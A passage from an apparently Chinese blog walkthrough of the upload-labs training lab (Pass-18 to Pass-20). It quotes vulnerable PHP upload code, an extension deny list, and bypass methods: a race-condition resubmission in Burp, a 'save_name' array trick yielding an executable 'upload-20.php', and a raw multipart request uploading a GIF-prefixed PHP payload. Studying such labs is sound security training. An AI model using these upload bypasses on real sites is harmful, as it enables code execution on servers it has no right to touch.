    }
    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    // if we are here, we are ready to move the file to destination
    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    // check if we need to rename the file
    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)
    return $this->resultUpload( "SUCCESS" );
  
  }..................
};
方法1:在很多php服务中 .7z有时候也会被执行成.php的文件
(1)burp抓包 send to reapeater
(2)filename="m.php.7z"
(3)不断burp抓包提交  速度够快 有可能服务器会出现来不及重命名的情况 这样就上传成功了
(4)m.php.7z 上传成功 
(5)http://127.0.0.1/upload/m.php.7z  服务器如果把压缩包当php执行 此时也就可以运行成功了
方法2:通过文件包含漏洞去包含相应上传的文件也可以执行
Pass-19
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            }else{
                $msg = '上传出错!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }}
Pass-20  burp抓包超级绕过 数组代码审计 
move_upload_file函数会忽略/.  出现在linux中
php reset()函数  //把数组内部指针重置到第一个元素
  1. <?php
  2. $people=array("Bill","Steve","Mark","David");
  3. echo current($people)."<br>";   //Bill
  4. echo next($people)."<br>";       //Steve
  5. echo reset($people);    //Bill
  6. ?>
分析过程:
输入相应的内容后经过几重绕过。首先是MIME检测,输入的内容在burp中已经修改过了MIME 所以绕过第一重检测
第二重是提交内容的检验 由于burp包中已经是save_name[0] save_name[2]的数组形式 所以is_array($file)=1 所以if语句不会执行 绕过第二重
之后end($file)是提交的save_name[2] 也就是jpg 成功绕过第三重限制
第四重 由于没有传入save_name[1] 所以这个部分不存在 所以count($file)=2 $file[count($file)-1]=$file[2] 也就是不存在 空格
那么此时的$file_name=upload-20.php.   (php后面是点和空格)
传入windows后 点和空格都不会被识别 所以最终的文件名字是upload-20.php
三道坎:1.文件格式验证  2.文件名分割  3.文件名合并
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        //如果提交的不是数组 那么用点把其分割成数组 如果不是数组 那么跳过这步
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));  //文件名小写 然后用点进行分割
            //如果传的是haha.php.jpg  分割完file数组里面有三个 一个是haha  一个是php  一个是jpg
        }
        $ext = end($file);  //拿到了数组的最后一个数组 也就是后缀名
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];  //reset()函数 取数组的第一个东西
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }}else{
    $msg = "请选择要上传的文件!";}
Content-Disposition: form-data; name="upload_file"; filename="haha.php"
Content-Type: image/jpeg
GIF89a
<?php phpinfo()?>
-----------------------------200222961522119
Content-Disposition: form-data; name="save_name[0]"
upload-20.php
-----------------------------200222961522119
Content-Disposition: form-data; name="save_name[2]"
jpg
  1. <?php
  2. //检查MIME
  3. $allow_type = array('image/jpeg','image/png','image/gif');
  4. if(!in_array($_FILES['upload_file']['type'],$allow_type)){
  5.     $msg = "禁止上传该类型文件!";
  6. }else{
  7.     //检查文件名
  8.     $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
  9.     //$file数组0--upload-20.php/   1--null 2--jpg
  10.     //如果不是数组,用.来把$file变成数组,如果本来就是数组,跳过此步骤
  11.     if (!is_array($file)) {
  12.      //文件名小写,然后用.进行分割
  13.         $file = explode('.', strtolower($file));
  14.     }
  15.     //拿到了数组的最后一个数据
  16.     $ext = end($file);//jpg
  17.     $allow_suffix = array('jpg','png','gif');
  18.     if (!in_array($ext, $allow_suffix)) {
  19.         $msg = "禁止上传该后缀文件!";
  20.     }else{
  21.      //upload-20.php
  22.         $file_name = reset($file) . '.' . $file[count($file) - 1];
  23.         $temp_file = $_FILES['upload_file']['tmp_name'];
  24.         $img_path = UPLOAD_PATH . '/' .$file_name;
  25.         if (move_uploaded_file($temp_file, $img_path)) {
  26.             $msg = "文件上传成功!";
  27.             $is_upload = true;
  28.         } else {
  29.             $msg = "文件上传失败!";
  30.         }
  31.     }
  32. ?>

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小桥流水78/article/detail/848540
推荐阅读
相关标签
  

闽ICP备14008679号